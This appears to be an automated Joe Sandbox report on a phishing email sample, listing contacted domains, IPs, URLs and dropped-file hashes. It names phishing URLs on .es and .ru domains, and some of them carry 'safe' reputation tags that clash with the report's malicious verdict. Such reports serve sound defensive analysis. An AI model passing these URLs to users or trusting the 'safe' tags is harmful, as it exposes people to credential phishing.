              https://oazh.jyqhucdd.es/klJXufEfoVWyqOE6vxVPgfrwrkf2EbGijn3BpmfMc6ERqrRn0ceLQ3mVBOSwx2160%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/abqxZQ7ipqHVgh300%Avira URL Cloudsafe
              https://dau2bh.hxnywi.ru/chiriya!bpgf4e0%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/zc6hjQbDowaAuB5rXli4tk4Mm1Cam8VNCSClffw0%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/gkc3XOLjzCm8jmvfyBjNz76Ol6ayzi7lFaEYnsLDqDcKCzWheIhcq0%Avira URL Cloudsafe
              https://oazh.jyqhucdd.es/wxgiTdFktHPmjU81RG6ZQtrrPTiXYgG1ANhYfqGrsYrDXCPBwVWhHPaN901800%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                github.com
                140.82.114.4
                truefalse
                  high
                  oazh.jyqhucdd.es
                  104.21.65.73
                  truetrue
                    unknown
                    code.jquery.com
                    151.101.2.137
                    truefalse
                      high
                      yikd3jrhwzutdfkf0d1jzrwgzygpoqnyi3yammrotk8rpayg1cfhk.xrfwss.ru
                      172.67.159.28
                      truefalse
                        unknown
                        cdnjs.cloudflare.com
                        104.17.25.14
                        truefalse
                          high
                          get.geojs.io
                          104.26.1.100
                          truefalse
                            high
                            www.google.com
                            142.251.40.164
                            truefalse
                              high
                              s-0005.dual-s-msedge.net
                              52.123.129.14
                              truefalse
                                high
                                dau2bh.hxnywi.ru
                                172.67.149.248
                                truefalse
                                  unknown
                                  d19d360lklgih4.cloudfront.net
                                  18.164.124.110
                                  truefalse
                                    high
                                    objects.githubusercontent.com
                                    185.199.108.133
                                    truefalse
                                      high
                                      birdeye.cx
                                      52.72.49.79
                                      truefalse
                                        high
                                        ok4static.oktacdn.com
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                            high
                                            https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                              high
                                              https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                high
                                                https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                                  high
                                                  https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                                    high
                                                    https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                                      high
                                                      https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                        high
                                                        https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                          high
                                                          https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                            high
                                                            https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                              high
                                                              https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                                high
                                                                https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                                  high
                                                                  https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                                    high
                                                                    https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                                      high
                                                                      https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                        high
                                                                        https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                              high
                                                                              https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                                  high
                                                                                  https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                                    high
                                                                                    https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                        high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                              high
                                                                                              https://oazh.jyqhucdd.es/klJXufEfoVWyqOE6vxVPgfrwrkf2EbGijn3BpmfMc6ERqrRn0ceLQ3mVBOSwx216false
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                                high
                                                                                                https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                                  high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                                    high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                                        high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                          high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                            high
                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                              high
                                                                                                              https://dau2bh.hxnywi.ru/chiriya!bpgf4efalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                          high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                                  high
                                                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                                                    high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://oazh.jyqhucdd.es/Yx6Is/true
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                          high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                            high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                              high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUtrue
                                                                                                                                                      unknown
                                                                                                                                                      https://oazh.jyqhucdd.es/abqxZQ7ipqHVgh30false
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                        high
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://oazh.jyqhucdd.es/wxgiTdFktHPmjU81RG6ZQtrrPTiXYgG1ANhYfqGrsYrDXCPBwVWhHPaN90180false
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule704200v0s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule702200v1s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule704050v0s19.xmlfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700350v1s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120648v0s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120657v0s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702500v1s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120660v0s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703500v0s19.xmlfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703950v0s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700200v1s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700500v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule701650v1s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule224902v2s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule700950v1s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120651v0s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120402v21s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120642v0s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule702950v1s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702651v1s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://oazh.jyqhucdd.es/zc6hjQbDowaAuB5rXli4tk4Mm1Cam8VNCSClffwfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702201v1s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120658v0s19.xmlfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703951v0s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120676v0s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700651v1s19.xmlfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700201v1s19.xmlfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701800v1s19.xmlfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702801v1s19.xmlfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703101v1s19.xmlfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://oazh.jyqhucdd.es/gkc3XOLjzCm8jmvfyBjNz76Ol6ayzi7lFaEYnsLDqDcKCzWheIhcqfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703401v0s19.xmlfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701551v1s19.xmlfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    140.82.114.4
                                                                                                                                                                                                                                    github.comUnited States
                                                                                                                                                                                                                                    36459GITHUBUSfalse
                                                                                                                                                                                                                                    52.72.49.79
                                                                                                                                                                                                                                    birdeye.cxUnited States
                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                    52.109.4.7
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    172.67.159.28
                                                                                                                                                                                                                                    yikd3jrhwzutdfkf0d1jzrwgzygpoqnyi3yammrotk8rpayg1cfhk.xrfwss.ruUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    104.26.1.100
                                                                                                                                                                                                                                    get.geojs.ioUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    52.123.129.14
                                                                                                                                                                                                                                    s-0005.dual-s-msedge.netUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    142.250.80.67
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    23.56.162.204
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    23.51.56.185
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                                                                                                                                                                                                                                    52.168.112.67
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                    18.164.124.11
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    172.67.189.39
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    172.64.41.3
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    104.21.65.73
                                                                                                                                                                                                                                    oazh.jyqhucdd.esUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    3.219.243.226
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                    172.67.149.248
                                                                                                                                                                                                                                    dau2bh.hxnywi.ruUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    64.233.180.84
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    1.1.1.1
                                                                                                                                                                                                                                    unknownAustralia
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    23.40.179.66
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                    151.101.2.137
                                                                                                                                                                                                                                    code.jquery.comUnited States
                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                    142.251.40.164
                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    18.164.124.110
                                                                                                                                                                                                                                    d19d360lklgih4.cloudfront.netUnited States
                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                    142.250.65.206
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    142.250.81.234
                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    185.199.108.133
                                                                                                                                                                                                                                    objects.githubusercontent.comNetherlands
                                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                                    104.17.25.14
                                                                                                                                                                                                                                    cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                    192.168.2.17
                                                                                                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                    Analysis ID:1648038
                                                                                                                                                                                                                                    Start date and time:2025-03-25 14:02:36 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    Analysis Mode:stream
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:suspectTelling clean needful (78.2 KB).msg
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.phis.evad.winMSG@37/69@34/94
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .msg
                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.40.179.66, 23.40.179.76, 52.123.129.14
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, dual-s-0005-office.config.skype.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • VT rate limit hit for: oazh.jyqhucdd.es
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                    Entropy (8bit):5.145335929834259
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:8357B2D05F83A0A570954E20AB23F925
                                                                                                                                                                                                                                    SHA1:8A0DF8085F1D4C43B0773B4F16DA53D96FE58D50
                                                                                                                                                                                                                                    SHA-256:9E68887EB44E442B4F43562FA0E42F947468ACA7E37AFC404586EEE5CEFFB159
                                                                                                                                                                                                                                    SHA-512:21D7E4072CDBE4366C1EB934709D0EE86935AFEC26F9BEA6DB6F053705BBB58AA922A6E77C14B1FA1E48052E4479B83361C4510AEF04C840C2E362171D785D70
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:2025/03/25-09:03:58.004 6dc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/25-09:03:58.006 6dc Recovering log #3.2025/03/25-09:03:58.006 6dc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):335
                                                                                                                                                                                                                                    Entropy (8bit):5.155177695988001
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:7FBC97E1BA4D621C9ED287D51B129654
                                                                                                                                                                                                                                    SHA1:230D77EA50A51C55046D7CCB59A461A46AE70AD6
                                                                                                                                                                                                                                    SHA-256:24A88F0DD0A147CA03C9D094B828D7C4B4B64FE86D4A348FD624CF6A47FA365B
                                                                                                                                                                                                                                    SHA-512:EC92530CD2CE6668574627E624F7FF6E9DB6565BC8657286BFC49BD991F8870261E3AA953E10B4828A8BC6019A7B0C275A72C85B9A0BAC052367DD9427D19D5B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:2025/03/25-09:03:57.906 410 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/25-09:03:57.910 410 Recovering log #3.2025/03/25-09:03:57.911 410 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6391
                                                                                                                                                                                                                                    Entropy (8bit):5.243208502740049
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:D7C315534538B9848A2A140652174D30
                                                                                                                                                                                                                                    SHA1:162D407D91B70D94480FB46D8B9E501D11578939
                                                                                                                                                                                                                                    SHA-256:BA32D0906C65505DB77F66A0E9777836443BC54A91FE8CEC452BC5B8B46E38F2
                                                                                                                                                                                                                                    SHA-512:03EE2BDA9884086CFB05A5B4A14DAA616D955ECE2C4125FCAB0EA1FC0DC329F6F41B2893428AAF36C6492E80E576C78704CDBF2DAD18E85D612C0BEC48FCDACF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):323
                                                                                                                                                                                                                                    Entropy (8bit):5.140198215632701
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:ED86658A45B05636EC4693FFFFD524DD
                                                                                                                                                                                                                                    SHA1:166F911D6B1DE309EF313F0D7DE0E134F4B014CC
                                                                                                                                                                                                                                    SHA-256:715555D8BE3825DB38DC983D696B4C62625ECB9828A6673512A42D707D955D05
                                                                                                                                                                                                                                    SHA-512:9228E8C3478D6DDE4487A89265A00E575E316D913CE9FD008B671C93FBBF6564AD031CCD18C3980A0117678A271BDAFCBFF2E9853557A8527A45E1830B7557E5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:2025/03/25-09:03:58.037 410 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/25-09:03:58.038 410 Recovering log #3.2025/03/25-09:03:58.040 410 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):65110
                                                                                                                                                                                                                                    Entropy (8bit):2.5041398903895957
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:B8B448518832886CF6DF1D270300A184
                                                                                                                                                                                                                                    SHA1:7EF379AF08F30054FD701E0572E9409F96A23A14
                                                                                                                                                                                                                                    SHA-256:69ADD8268F85F9247CC18FAA9FFF91AACC0A3DD3CE67DF8A5D84C50B288F907B
                                                                                                                                                                                                                                    SHA-512:9E5E99C0F8B168238BC896E584167337975BB0A4C5102DE16CDC0509AD5AAECE123A9543F3874EC8843B071E912DF6CD4E1F1F337B5B82B6279957DA0A54DC4F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):86016
                                                                                                                                                                                                                                    Entropy (8bit):4.444738411235859
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:B4CD9671246EAA3C57FA5F20F3FEC7AD
